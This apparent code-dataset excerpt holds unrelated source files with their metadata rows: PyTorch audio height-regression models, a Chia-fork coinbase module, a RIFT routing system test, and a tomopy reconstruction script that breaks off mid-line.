nn.Conv1d(inp_dim, lstm_h, 7),
nn.ReLU(),
nn.BatchNorm1d(lstm_h),
nn.MaxPool1d(2,2),
nn.Conv1d(lstm_h, lstm_h, 7),
nn.ReLU(),
nn.BatchNorm1d(lstm_h),
nn.MaxPool1d(2,2),
nn.Conv1d(lstm_h, lstm_h, 7),
nn.ReLU(),
nn.BatchNorm1d(lstm_h),
# nn.MaxPool1d(2,2),
# TransposeLSTM(lstm_h)
TransposeAttn(lstm_h)
)
self.height_regressor = nn.Sequential(
nn.Linear(3*lstm_h, lstm_h),
nn.ReLU(),
nn.Linear(lstm_h, 1)
)
def forward(self, x):
x = x.squeeze(1)
fm3 = self.cnn3(x).view(-1, self.lstm_h)
fm5 = self.cnn5(x).view(-1, self.lstm_h)
fm7 = self.cnn7(x).view(-1, self.lstm_h)
fm = torch.cat([fm3, fm5, fm7], 1)
height = self.height_regressor(fm)
return height
class Wav2VecLSTMH(nn.Module):
def __init__(self, lstm_h, lstm_inp=512):
super().__init__()
self.encoder = wavencoder.models.Wav2Vec(pretrained=True)
# self.encoder = Wav2Vec2Model.from_pretrained("facebook/wav2vec2-base-960h").feature_extractor
for param in self.encoder.parameters():
param.requires_grad = False
# for param in self.encoder.feature_extractor.conv_layers[5:].parameters():
# param.requires_grad = True
self.lstm = nn.LSTM(lstm_inp, lstm_h, batch_first=True)
# self.attention = wavencoder.layers.SoftAttention(lstm_h, lstm_h)
self.height_regressor = nn.Linear(lstm_h, 1)
def forward(self, x):
x = x.squeeze(1)
x = self.encoder(x)
output, (hidden, _) = self.lstm(x.transpose(1,2))
# attn_output = self.attention(output)
attn_output = output[:, -1, :]
height = self.height_regressor(attn_output)
return height
class SpectralLSTMH(nn.Module):
def __init__(self, lstm_h):
super().__init__()
self.normalize = nn.BatchNorm1d(40)
self.lstm = nn.LSTM(40, lstm_h, batch_first=True, num_layers=2)
self.attention = wavencoder.layers.SoftAttention(lstm_h, lstm_h)
self.height_regressor = nn.Sequential(
nn.Linear(lstm_h, lstm_h),
nn.ReLU(),
nn.Linear(lstm_h, 1))
def forward(self, x):
x = x.squeeze(1)
x = self.normalize(x)
output, (hidden, _) = self.lstm(x.transpose(1,2))
attn_output = self.attention(output)
height = self.height_regressor(attn_output)
return height
| 32.501475
| 103
| 0.552641
| 1,406
| 11,018
| 4.112376
| 0.06899
| 0.121065
| 0.048253
| 0.050156
| 0.894154
| 0.889139
| 0.889139
| 0.885853
| 0.850398
| 0.847631
| 0
| 0.033826
| 0.318479
| 11,018
| 339
| 104
| 32.501475
| 0.736183
| 0.058359
| 0
| 0.845878
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0
| 0.010753
| 0
| 0.139785
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be1ca7378afd4819c2e9608b28938a17a267e2d1
| 2,342
|
py
|
Python
|
chia/consensus/coinbase.py
|
Hydrangea-Network/hydrangea-blockchain
|
d15662329958dbdaa9cbd99733ba729f0e74ce54
|
[
"Apache-2.0"
] | 1
|
2022-03-15T06:41:49.000Z
|
2022-03-15T06:41:49.000Z
|
chia/consensus/coinbase.py
|
Hydrangea-Network/hydrangea-blockchain
|
d15662329958dbdaa9cbd99733ba729f0e74ce54
|
[
"Apache-2.0"
] | null | null | null |
chia/consensus/coinbase.py
|
Hydrangea-Network/hydrangea-blockchain
|
d15662329958dbdaa9cbd99733ba729f0e74ce54
|
[
"Apache-2.0"
] | null | null | null |
from blspy import G1Element
from chia.types.blockchain_format.coin import Coin
from chia.types.blockchain_format.sized_bytes import bytes32
from chia.util.ints import uint32, uint64
from chia.wallet.puzzles.p2_delegated_puzzle_or_hidden_puzzle import puzzle_for_pk
def create_puzzlehash_for_pk(pub_key: G1Element) -> bytes32:
return puzzle_for_pk(pub_key).get_tree_hash()
def pool_parent_id(block_height: uint32, genesis_challenge: bytes32) -> bytes32:
return bytes32(genesis_challenge[:16] + block_height.to_bytes(16, "big"))
def community_parent_id(block_height: uint32, genesis_challenge: bytes32) -> bytes32:
return bytes32(genesis_challenge[:16] + block_height.to_bytes(16, "big"))
def staking_parent_id(block_height: uint32, genesis_challenge: bytes32) -> bytes32:
return bytes32(genesis_challenge[:16] + block_height.to_bytes(16, "big"))
def farmer_parent_id(block_height: uint32, genesis_challenge: bytes32) -> bytes32:
return bytes32(genesis_challenge[16:] + block_height.to_bytes(16, "big"))
def timelord_parent_id(block_height: uint32, genesis_challenge: bytes32) -> bytes32:
return bytes32(genesis_challenge[:16] + block_height.to_bytes(16, "big"))
def create_pool_coin(block_height: uint32, puzzle_hash: bytes32, reward: uint64, genesis_challenge: bytes32):
parent_id = pool_parent_id(block_height, genesis_challenge)
return Coin(parent_id, puzzle_hash, reward)
def create_community_coin(block_height: uint32, puzzle_hash: bytes32, reward: uint64, genesis_challenge: bytes32):
parent_id = community_parent_id(block_height, genesis_challenge)
return Coin(parent_id, puzzle_hash, reward)
def create_staking_coin(block_height: uint32, puzzle_hash: bytes32, reward: uint64, genesis_challenge: bytes32):
parent_id = staking_parent_id(block_height, genesis_challenge)
return Coin(parent_id, puzzle_hash, reward)
def create_farmer_coin(block_height: uint32, puzzle_hash: bytes32, reward: uint64, genesis_challenge: bytes32):
parent_id = farmer_parent_id(block_height, genesis_challenge)
return Coin(parent_id, puzzle_hash, reward)
def create_timelord_coin(block_height: uint32, puzzle_hash: bytes32, reward: uint64, genesis_challenge: bytes32):
parent_id = timelord_parent_id(block_height, genesis_challenge)
return Coin(parent_id, puzzle_hash, reward)
| 45.038462
| 114
| 0.799744
| 325
| 2,342
| 5.412308
| 0.150769
| 0.090961
| 0.073906
| 0.108016
| 0.836839
| 0.765208
| 0.765208
| 0.765208
| 0.765208
| 0.765208
| 0
| 0.053212
| 0.109308
| 2,342
| 51
| 115
| 45.921569
| 0.790029
| 0
| 0
| 0.28125
| 0
| 0
| 0.006405
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.34375
| false
| 0
| 0.15625
| 0.1875
| 0.84375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
5806515164c48ebe63dc086530a9dad87460890a
| 19,931
|
py
|
Python
|
tests/test_sys_3n_l0_l1_l2.py
|
tcaiazzi/rift-python
|
0d185547d6b37289e8a7e308cd1c4b78bc0fa3ef
|
[
"Apache-2.0"
] | null | null | null |
tests/test_sys_3n_l0_l1_l2.py
|
tcaiazzi/rift-python
|
0d185547d6b37289e8a7e308cd1c4b78bc0fa3ef
|
[
"Apache-2.0"
] | null | null | null |
tests/test_sys_3n_l0_l1_l2.py
|
tcaiazzi/rift-python
|
0d185547d6b37289e8a7e308cd1c4b78bc0fa3ef
|
[
"Apache-2.0"
] | null | null | null |
# System test: test_sys_3n_l0_l1_l2
# 3n_l0_l1_l2 = 3 nodes: level 0, level 1, and level 2
# Allow long test names
# pylint: disable=invalid-name
import os
from rift_expect_session import RiftExpectSession
from log_expect_session import LogExpectSession
def check_rift_node1_intf_up(res):
res.check_adjacency_3way(
node="node1",
interface="if1")
res.check_rx_offer(
node="node1",
interface="if1",
system_id="2",
level=1,
not_a_ztp_offer="(False///True)", # Juniper lenient
state="THREE_WAY",
best="(True///False)", # Juniper lenient
best_3way="(True///False)", # Juniper lenient
removed="(False///True)", # Juniper lenient
removed_reason="(Level is leaf///Not a ZTP offer flag set///)") # Juniper lenient
res.check_tx_offer(
node="node1",
interface="if1",
system_id="1",
level=2,
not_a_ztp_offer=False,
state="THREE_WAY")
res.check_level(
node="node1",
configured_level=2,
hal="(1///None)", # Juniper lenient
hat="(1///None)", # Juniper lenient
level_value=2)
expect_south_spf = [
r"| 1 \(node1\) | 0 | | | | |",
r"| 2 \(node2\) | 1 | 1 | | | if1",
r"| 3 \(node3\) | 2 | 2 | | | if1",
r"| 1.1.1.1/32 | 1 | 1 | | | |",
r"| 2.2.2.2/32 | 2 | 2 | | | if1",
r"| 3.3.3.3/32 | 3 | 3 | | | if1",
r"| 1111:1111::/128 | 1 | 1 | | | |",
r"| 2222:2222::/128 | 2 | 2 | | | if1",
r"| 3333:3333::/128 | 3 | 3 | | | if1",
]
expect_north_spf = [
r"| 1 \(node1\) | 0 | | | |",
r"| 1.1.1.1/32 | 1 | 1 | | |",
r"| 1111:1111::/128 | 1 | 1 | | |",
]
res.check_spf("node1", expect_south_spf, expect_north_spf)
res.check_spf_absent("node1", "south", "0.0.0.0/0")
res.check_spf_absent("node1", "south", "::/0")
res.check_spf_absent("node1", "north", "2")
res.check_spf_absent("node1", "north", "3")
res.check_spf_absent("node1", "north", "0.0.0.0/0")
res.check_spf_absent("node1", "north", "2.2.2.2/32")
res.check_spf_absent("node1", "north", "3.3.3.3/32")
res.check_spf_absent("node1", "north", "::/0")
res.check_spf_absent("node1", "north", "2222:2222::/128")
res.check_spf_absent("node1", "north", "3333:3333::/128")
expect_rib = [
r"| 2.2.2.2/32 | South SPF | if1",
r"| 3.3.3.3/32 | South SPF | if1",
r"| 2222:2222::/128 | South SPF | if1",
r"| 3333:3333::/128 | South SPF | if1",
]
res.check_rib("node1", expect_rib)
res.check_rib_absent("node1", "0.0.0.0/0", "south-spf")
res.check_rib_absent("node1", "0.0.0.0/0", "north-spf")
res.check_rib_absent("node1", "1.1.1.1/32", "south-spf")
res.check_rib_absent("node1", "1.1.1.1/32", "north-spf")
res.check_rib_absent("node1", "2.2.2.2/32", "north-spf")
res.check_rib_absent("node1", "3.3.3.3/32", "north-spf")
res.check_rib_absent("node1", "::/0", "south-spf")
res.check_rib_absent("node1", "::/0", "north-spf")
res.check_rib_absent("node1", "1111:1111::/128", "south-spf")
res.check_rib_absent("node1", "1111:1111::/128", "north-spf")
res.check_rib_absent("node1", "2222:2222::/128", "north-spf")
res.check_rib_absent("node1", "3333:3333::/128", "north-spf")
def check_rift_node1_intf_down(res):
res.check_adjacency_1way(
node="node1",
interface="if1")
res.check_rx_offer(
node="node1",
interface="if1",
system_id="2",
level=1,
not_a_ztp_offer="(False///True)", # Juniper lenient
state="THREE_WAY",
best=False,
best_3way=False,
removed=True,
removed_reason="Hold-time expired")
res.check_tx_offer(
node="node1",
interface="if1",
system_id="1",
level=2,
not_a_ztp_offer=False,
state="ONE_WAY")
res.check_level(
node="node1",
configured_level=2,
hal="None",
hat="None",
level_value=2)
expect_south_spf = [
r"| 1 \(node1\) | 0 | | | | |",
r"| 1.1.1.1/32 | 1 | 1 | | | |",
r"| 1111:1111::/128 | 1 | 1 | | | |",
]
expect_north_spf = [
r"| 1 \(node1\) | 0 | | | |",
r"| 1.1.1.1/32 | 1 | 1 | | |",
r"| 1111:1111::/128 | 1 | 1 | | |",
]
res.check_spf("node1", expect_south_spf, expect_north_spf)
res.check_spf_absent("node1", "south", "2")
res.check_spf_absent("node1", "south", "3")
res.check_spf_absent("node1", "south", "0.0.0.0/0")
res.check_spf_absent("node1", "south", "2.2.2.2/32")
res.check_spf_absent("node1", "south", "3.3.3.3/32")
res.check_spf_absent("node1", "south", "::/0")
res.check_spf_absent("node1", "south", "2222:2222::/128")
res.check_spf_absent("node1", "south", "3333:3333::/128")
res.check_spf_absent("node1", "north", "2")
res.check_spf_absent("node1", "north", "3")
res.check_spf_absent("node1", "north", "0.0.0.0/0")
res.check_spf_absent("node1", "north", "2.2.2.2/32")
res.check_spf_absent("node1", "north", "3.3.3.3/32")
res.check_spf_absent("node1", "north", "::/0")
res.check_spf_absent("node1", "north", "2222:2222::/128")
res.check_spf_absent("node1", "north", "3333:3333::/128")
def check_rift_node2_intf_up(res):
res.check_adjacency_3way(
node="node2",
interface="if1")
res.check_adjacency_3way(
node="node2",
interface="if2")
res.check_rx_offer(
node="node2",
interface="if1",
system_id="1",
level=2,
not_a_ztp_offer=False,
state="THREE_WAY",
best=True,
best_3way=True,
removed=False,
removed_reason="")
res.check_rx_offer(
node="node2",
interface="if2",
system_id="3",
level=0,
not_a_ztp_offer="(False///True)", # Juniper lenient
state="THREE_WAY",
best=False,
best_3way=False,
removed=True,
removed_reason="(Level is leaf///Not a ZTP offer flag set)") # Juniper lenient
res.check_tx_offer(
node="node2",
interface="if1",
system_id="2",
level=1,
not_a_ztp_offer=False,
state="THREE_WAY")
res.check_tx_offer(
node="node2",
interface="if2",
system_id="2",
level=1,
not_a_ztp_offer=False,
state="THREE_WAY")
res.check_level(
node="node2",
configured_level=1,
hal=2,
hat=2,
level_value=1)
expect_south_spf = [
r"| 2 \(node2\) | 0 | | | | |",
r"| 3 \(node3\) | 1 | 2 | | | if2",
r"| 2.2.2.2/32 | 1 | 2 | | | |",
r"| 3.3.3.3/32 | 2 | 3 | | | if2",
r"| 2222:2222::/128 | 1 | 2 | | | |",
r"| 3333:3333::/128 | 2 | 3 | | | if2",
]
expect_north_spf = [
r"| 1 \(node1\) | 1 | 2 | | | if1",
r"| 2 \(node2\) | 0 | | | | |",
r"| 0.0.0.0/0 | 2 | 1 | | | if1",
r"| 2.2.2.2/32 | 1 | 2 | | | |",
r"| ::/0 | 2 | 1 | | | if1",
r"| 2222:2222::/128 | 1 | 2 | | | |",
]
res.check_spf("node2", expect_south_spf, expect_north_spf)
res.check_spf_absent("node2", "south", "1")
res.check_spf_absent("node2", "south", "0.0.0.0/0")
res.check_spf_absent("node2", "south", "1.1.1.1/32")
res.check_spf_absent("node2", "south", "::/0")
res.check_spf_absent("node2", "south", "1111:1111::/128")
res.check_spf_absent("node2", "north", "3")
res.check_spf_absent("node2", "north", "3.3.3.3/32")
res.check_spf_absent("node2", "north", "3333:3333::/128")
expect_rib = [
r"| 0.0.0.0/0 | North SPF | if1",
r"| 3.3.3.3/32 | South SPF | if2",
r"| ::/0 | North SPF | if1",
r"| 3333:3333::/128 | South SPF | if2",
]
res.check_rib("node2", expect_rib)
res.check_rib_absent("node2", "0.0.0.0/0", "south-spf")
res.check_rib_absent("node2", "2.2.2.2/32", "south-spf")
res.check_rib_absent("node2", "2.2.2.2/32", "north-spf")
res.check_rib_absent("node2", "3.3.3.3/32", "north-spf")
res.check_rib_absent("node2", "::/0", "south-spf")
res.check_rib_absent("node2", "2222:2222::/128", "south-spf")
res.check_rib_absent("node2", "2222:2222::/128", "north-spf")
res.check_rib_absent("node2", "3333:3333::/128", "north-spf")
def check_rift_node2_intf_down(res):
res.check_adjacency_1way(
node="node2",
interface="if1")
res.check_rx_offer(
node="node2",
interface="if1",
system_id="1",
level=2,
not_a_ztp_offer="(False///True)", # Juniper lenient
state="THREE_WAY",
best=False,
best_3way=False,
removed=True,
removed_reason="Hold-time expired")
res.check_rx_offer(
node="node2",
interface="if2",
system_id="3",
level=0,
not_a_ztp_offer="(False///True)", # Juniper lenient
state="THREE_WAY",
best=False,
best_3way=False,
removed=True,
removed_reason="(Level is leaf///Not a ZTP offer flag set)") # Juniper lenient
res.check_tx_offer(
node="node2",
interface="if1",
system_id="2",
level=1,
not_a_ztp_offer=False,
state="ONE_WAY")
res.check_tx_offer(
node="node2",
interface="if2",
system_id="2",
level=1,
not_a_ztp_offer=False,
state="THREE_WAY")
res.check_level(
node="node2",
configured_level=1,
hal=None,
hat=None,
level_value=1)
expect_south_spf = [
r"| 2 \(node2\) | 0 | | | | |",
r"| 3 \(node3\) | 1 | 2 | | | if2",
r"| 2.2.2.2/32 | 1 | 2 | | | |",
r"| 3.3.3.3/32 | 2 | 3 | | | if2",
r"| 2222:2222::/128 | 1 | 2 | | | |",
r"| 3333:3333::/128 | 2 | 3 | | | if2",
]
expect_north_spf = [
r"| 2 \(node2\) | 0 | | | | |",
r"| 2.2.2.2/32 | 1 | 2 | | | |",
r"| 2222:2222::/128 | 1 | 2 | | | |",
]
res.check_spf("node2", expect_south_spf, expect_north_spf)
res.check_spf_absent("node2", "south", "1")
res.check_spf_absent("node2", "south", "0.0.0.0/0")
res.check_spf_absent("node2", "south", "1.1.1.1/32")
res.check_spf_absent("node2", "south", "::/0")
res.check_spf_absent("node2", "south", "1111:1111::/128")
res.check_spf_absent("node2", "north", "1")
res.check_spf_absent("node2", "north", "3")
res.check_spf_absent("node2", "north", "0.0.0.0/0")
res.check_spf_absent("node2", "north", "3.3.3.3/32")
res.check_spf_absent("node2", "north", "::/0")
res.check_spf_absent("node2", "north", "3333:3333::/128")
expect_rib = [
r"| 3.3.3.3/32 | South SPF | if2",
r"| 3333:3333::/128 | South SPF | if2",
]
res.check_rib("node2", expect_rib)
res.check_rib_absent("node2", "0.0.0.0/0", "south-spf")
res.check_rib_absent("node2", "0.0.0.0/0", "north-spf")
res.check_rib_absent("node2", "2.2.2.2/32", "south-spf")
res.check_rib_absent("node2", "2.2.2.2/32", "north-spf")
res.check_rib_absent("node2", "3.3.3.3/32", "north-spf")
res.check_rib_absent("node2", "::/0", "south-spf")
res.check_rib_absent("node2", "::/0", "north-spf")
res.check_rib_absent("node2", "2222:2222::/128", "south-spf")
res.check_rib_absent("node2", "2222:2222::/128", "north-spf")
res.check_rib_absent("node2", "3333:3333::/128", "north-spf")
def check_rift_node3_intf_up(res):
res.check_adjacency_3way(
node="node3",
interface="if1")
res.check_rx_offer(
node="node3",
interface="if1",
system_id="2",
level=1,
not_a_ztp_offer=False,
state="THREE_WAY",
best=True,
best_3way=True,
removed=False,
removed_reason="")
res.check_tx_offer(
node="node3",
interface="if1",
system_id="3",
level=0,
not_a_ztp_offer=False,
state="THREE_WAY")
res.check_level(
node="node3",
configured_level=0,
hal=1,
hat=1,
level_value=0)
expect_south_spf = [
r"| 3 \(node3\) | 0 | | | | |",
r"| 3.3.3.3/32 | 1 | 3 | | | |",
r"| 3333:3333::/128 | 1 | 3 | | | |",
]
expect_north_spf = [
r"| 2 \(node2\) | 1 | 3 | | | if1",
r"| 3 \(node3\) | 0 | | | | |",
r"| 0.0.0.0/0 | 2 | 2 | | | if1",
r"| 3.3.3.3/32 | 1 | 3 | | | |",
r"| ::/0 | 2 | 2 | | | if1",
r"| 3333:3333::/128 | 1 | 3 | | | |",
]
res.check_spf("node3", expect_south_spf, expect_north_spf)
res.check_spf_absent("node3", "south", "1")
res.check_spf_absent("node3", "south", "2")
res.check_spf_absent("node3", "south", "0.0.0.0/0")
res.check_spf_absent("node3", "south", "1.1.1.1/32")
res.check_spf_absent("node3", "south", "2.2.2.2/32")
res.check_spf_absent("node3", "south", "::/0")
res.check_spf_absent("node3", "south", "1111:1111::/128")
res.check_spf_absent("node3", "south", "2222:2222::/128")
res.check_spf_absent("node3", "north", "1")
res.check_spf_absent("node3", "north", "1.1.1.1/32")
res.check_spf_absent("node3", "north", "2.2.2.2/32")
res.check_spf_absent("node3", "north", "1111:1111::/128")
res.check_spf_absent("node3", "north", "2222:2222::/128")
expect_rib = [
r"| 0.0.0.0/0 | North SPF | if1",
r"| ::/0 | North SPF | if1",
]
res.check_rib("node3", expect_rib)
res.check_rib_absent("node3", "0.0.0.0/0", "south-spf")
res.check_rib_absent("node3", "1.1.1.1/32", "south-spf")
res.check_rib_absent("node3", "1.1.1.1/32", "north-spf")
res.check_rib_absent("node3", "2.2.2.2/32", "south-spf")
res.check_rib_absent("node3", "2.2.2.2/32", "north-spf")
res.check_rib_absent("node3", "3.3.3.3/32", "south-spf")
res.check_rib_absent("node3", "3.3.3.3/32", "north-spf")
res.check_rib_absent("node3", "::/0", "south-spf")
res.check_rib_absent("node3", "1111:1111::/128", "south-spf")
res.check_rib_absent("node3", "1111:1111::/128", "north-spf")
res.check_rib_absent("node3", "2222:2222::/128", "south-spf")
res.check_rib_absent("node3", "2222:2222::/128", "north-spf")
res.check_rib_absent("node3", "3333:3333::/128", "north-spf")
res.check_rib_absent("node3", "3333:3333::/128", "south-spf")
def check_rift_node3_intf_down(res):
res.check_adjacency_3way(
node="node3",
interface="if1")
res.check_rx_offer(
node="node3",
interface="if1",
system_id="2",
level=1,
not_a_ztp_offer=False,
state="THREE_WAY",
best=True,
best_3way=True,
removed=False,
removed_reason="")
res.check_tx_offer(
node="node3",
interface="if1",
system_id="3",
level=0,
not_a_ztp_offer=False,
state="THREE_WAY")
res.check_level(
node="node3",
configured_level=0,
hal=1,
hat=1,
level_value=0)
expect_south_spf = [
r"| 3 \(node3\) | 0 | | | | |",
r"| 3.3.3.3/32 | 1 | 3 | | | |",
r"| 3333:3333::/128 | 1 | 3 | | | |",
]
expect_north_spf = [
r"| 2 \(node2\) | 1 | 3 | | | if1",
r"| 3 \(node3\) | 0 | | | | |",
r"| 0.0.0.0/0 | 2 | 2 | | | if1",
r"| 3.3.3.3/32 | 1 | 3 | | | |",
r"| ::/0 | 2 | 2 | | | if1",
r"| 3333:3333::/128 | 1 | 3 | | | |",
]
res.check_spf("node3", expect_south_spf, expect_north_spf)
res.check_spf_absent("node3", "south", "1")
res.check_spf_absent("node3", "south", "2")
res.check_spf_absent("node3", "south", "0.0.0.0/0")
res.check_spf_absent("node3", "south", "1.1.1.1/32")
res.check_spf_absent("node3", "south", "2.2.2.2/32")
res.check_spf_absent("node3", "south", "::/0")
res.check_spf_absent("node3", "south", "1111:1111::/128")
res.check_spf_absent("node3", "south", "2222:2222::/128")
res.check_spf_absent("node3", "north", "1")
res.check_spf_absent("node3", "north", "1.1.1.1/32")
res.check_spf_absent("node3", "north", "2.2.2.2/32")
res.check_spf_absent("node3", "north", "1111:1111::/128")
res.check_spf_absent("node3", "north", "2222:2222::/128")
expect_rib = [
r"| 0.0.0.0/0 | North SPF | if1",
r"| ::/0 | North SPF | if1",
]
res.check_rib("node3", expect_rib)
res.check_rib_absent("node3", "0.0.0.0/0", "south-spf")
res.check_rib_absent("node3", "1.1.1.1/32", "south-spf")
res.check_rib_absent("node3", "1.1.1.1/32", "north-spf")
res.check_rib_absent("node3", "2.2.2.2/32", "south-spf")
res.check_rib_absent("node3", "2.2.2.2/32", "north-spf")
res.check_rib_absent("node3", "3.3.3.3/32", "north-spf")
res.check_rib_absent("node3", "3.3.3.3/32", "south-spf")
res.check_rib_absent("node3", "::/0", "south-spf")
res.check_rib_absent("node3", "1111:1111::/128", "south-spf")
res.check_rib_absent("node3", "1111:1111::/128", "north-spf")
res.check_rib_absent("node3", "2222:2222::/128", "south-spf")
res.check_rib_absent("node3", "2222:2222::/128", "north-spf")
res.check_rib_absent("node3", "3333:3333::/128", "south-spf")
res.check_rib_absent("node3", "3333:3333::/128", "north-spf")
def check_log_node1_intf_up(les):
les.check_lie_fsm_3way("node1", "if1")
def check_log_node1_intf_down(les):
les.check_lie_fsm_timeout_to_1way("node1", "if1", "set interface if1 failure failed")
def check_log_node2_intf_up(les):
les.check_lie_fsm_3way("node2", "if1")
les.check_lie_fsm_3way("node2", "if2")
def check_log_node2_intf_down(les):
les.check_lie_fsm_timeout_to_1way("node2", "if1", "set interface if1 failure failed")
def check_log_node3_intf_up(les):
les.check_lie_fsm_3way("node3", "if1")
def check_log_node3_intf_down(les):
les.check_lie_fsm_3way("node3", "if1")
def test_3n_l0_l1_l2():
passive_nodes = os.getenv("RIFT_PASSIVE_NODES", "").split(",")
# Bring topology up
les = LogExpectSession()
res = RiftExpectSession("3n_l0_l1_l2")
# Check that node1-node2 and node2-node3 adjacencies reaches 3-way
if "node1" not in passive_nodes:
check_rift_node1_intf_up(res)
check_log_node1_intf_up(les)
if "node2" not in passive_nodes:
check_rift_node2_intf_up(res)
check_log_node2_intf_up(les)
if "node3" not in passive_nodes:
check_rift_node3_intf_up(res)
check_log_node3_intf_up(les)
if "node1" not in passive_nodes:
# Bring interface if1 on node1 down
res.interface_failure("node1", "if1", "failed")
check_rift_node1_intf_down(res)
check_log_node1_intf_down(les)
if "node2" not in passive_nodes:
check_rift_node2_intf_down(res)
check_log_node2_intf_down(les)
if "node3" not in passive_nodes:
check_rift_node3_intf_down(res)
check_log_node3_intf_down(les)
# Bring interface if1 on node1 up again
res.interface_failure("node1", "if1", "ok")
check_rift_node1_intf_up(res)
check_log_node1_intf_up(les)
if "node2" not in passive_nodes:
check_rift_node2_intf_up(res)
check_log_node2_intf_up(les)
if "node3" not in passive_nodes:
check_rift_node3_intf_up(res)
check_log_node3_intf_up(les)
# TODO: add test cases for bringing interface node2-node3 down
# Done
res.stop()
| 37.748106
| 90
| 0.55075
| 2,914
| 19,931
| 3.539121
| 0.039121
| 0.138078
| 0.082129
| 0.117037
| 0.935906
| 0.918937
| 0.881703
| 0.866479
| 0.833317
| 0.79841
| 0
| 0.114496
| 0.255481
| 19,931
| 527
| 91
| 37.819734
| 0.580497
| 0.028398
| 0
| 0.800399
| 0
| 0
| 0.31927
| 0
| 0
| 0
| 0
| 0.001898
| 0
| 1
| 0.025948
| false
| 0.017964
| 0.005988
| 0
| 0.031936
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ed0951b2b614767116685a8cf4b7debb97306e6b
| 34,554
|
py
|
Python
|
doc/collection/APS_32ID/interlaced/recon.py
|
pengdada/timbir
|
c9bda62d2c45cc3860a2834dd82fdc5d529ce183
|
[
"BSD-3-Clause"
] | 10
|
2015-04-08T01:53:01.000Z
|
2021-01-12T17:06:06.000Z
|
doc/collection/APS_32ID/interlaced/recon.py
|
pengdada/timbir
|
c9bda62d2c45cc3860a2834dd82fdc5d529ce183
|
[
"BSD-3-Clause"
] | 13
|
2015-03-26T01:20:34.000Z
|
2017-02-24T15:38:09.000Z
|
doc/collection/APS_32ID/interlaced/recon.py
|
pengdada/timbir
|
c9bda62d2c45cc3860a2834dd82fdc5d529ce183
|
[
"BSD-3-Clause"
] | 11
|
2015-06-03T20:01:41.000Z
|
2020-05-02T05:23:18.000Z
|
from __future__ import print_function
import os
import tomopy
import numpy as np
import sys
import reader
from TIMBIR_angles import gen_theta as _gen_theta_timbir
from TIMBIR_angles import calc_dropped_angles
# # Program settings
# MPI
_usempi = False
_nprocs = 1
_rank = 0
# multiprocessing
# only _nchunk is used in starting processes
# if _nchunk is None, _nchunk = (ndim - 1) // _ncore + 1
# where ndim = arr.shape[axis]
_ncore = None
_nchunk = None
# # Number of z slices in a single reconstruction run
# _z_recon_size = None
def set_mpi(usempi=True):
global _nprocs
global _rank
if usempi:
_usempi = True
from mpi4py import MPI
comm = MPI.COMM_WORLD
_nprocs = comm.Get_size()
_rank = comm.Get_rank()
else:
_usempi = False
_nprocs = 1
_rank = 0
def set_mp(ncore=None, nchunk=None):
global _ncore, _nchunk
_ncore = ncore
_nchunk = nchunk
# def set_z_recon_size(z_recon_size=None):
# global _z_recon_size
# _z_recon_size = z_recon_size
def show_settings():
print("rank =", _rank)
print("nprocs =", _nprocs)
print("ncore =", _ncore)
print("nchunk =", _nchunk)
# print("z_recon_size =", _z_recon_size)
def gen_theta(n, period=np.pi):
return np.arange(0, period, period/n)
def gen_theta_timbir(K, N_theta, SlewSpeed=0, MinAcqTime=0, TotalNumCycles=1):
thetas = _gen_theta_timbir(K, N_theta, TotalNumCycles)
return thetas[~calc_dropped_angles(thetas, SlewSpeed*np.pi/180*MinAcqTime, verbose=True, TotalNumCycles=TotalNumCycles)]
def recon(io_paras, data_paras, rot_center=None, normalize=True, stripe_removal=10, phase_retrieval=False,
opt_center=False, diag_center=False, output="tiff"):
# Input and output
datafile = io_paras.get('datafile')
path2white = io_paras.get('path2white', datafile)
path2dark = io_paras.get('path2dark', path2white)
out_dir = io_paras.get('out_dir')
diag_cent_dir = io_paras.get('diag_cent_dir', out_dir+"/center_diagnose/")
recon_dir = io_paras.get('recon_dir', out_dir+"/recon/")
out_prefix = io_paras.get('out_prefix', "recon_")
# Parameters of dataset
NumCycles = data_paras.get('NumCycles', 1) # Number of cycles used for recon
ProjPerCycle = data_paras.get('ProjPerCycle') # Number of projections per cycle, N_theta
cycle_offset = data_paras.get('cycle_offset', 0) # Offset in output cycle number
proj_start = data_paras.get('proj_start', 0) # Starting projection of reconstruction
proj_step = data_paras.get('proj_step')
z_start = data_paras.get('z_start', 0)
z_end = data_paras.get('z_end', z_start+1)
z_step = data_paras.get('z_step')
x_start = data_paras.get('x_start')
x_end = data_paras.get('x_end', x_start+1)
x_step = data_paras.get('x_step')
white_start = data_paras.get('white_start')
white_end = data_paras.get('white_end')
dark_start = data_paras.get('dark_start')
dark_end = data_paras.get('dark_end')
rot_center_copy = rot_center
for cycle in xrange(NumCycles):
# Set start and end of each cycle
projections_start = cycle * ProjPerCycle + proj_start
projections_end = projections_start + ProjPerCycle
slice1 = slice(projections_start, projections_end, proj_step)
slice2 = slice(z_start, z_end, z_step)
slice3 = slice(x_start, x_end, x_step)
slices = (slice1, slice2, slice3)
white_slices = (slice(white_start, white_end), slice2, slice3)
dark_slices = (slice(dark_start, dark_end), slice2, slice3)
print("Running cycle #%s (projs %s to %s)"
% (cycle, projections_start, projections_end))
# Read HDF5 file.
print("Reading datafile %s..." % datafile, end="")
sys.stdout.flush()
data, white, dark = reader.read_aps_2bm(datafile, slices, white_slices, dark_slices,
path2white=path2white, path2dark=path2dark)
theta = gen_theta(data.shape[0])
print("Done!")
print("Data shape = %s;\nwhite shape = %s;\ndark shape = %s."
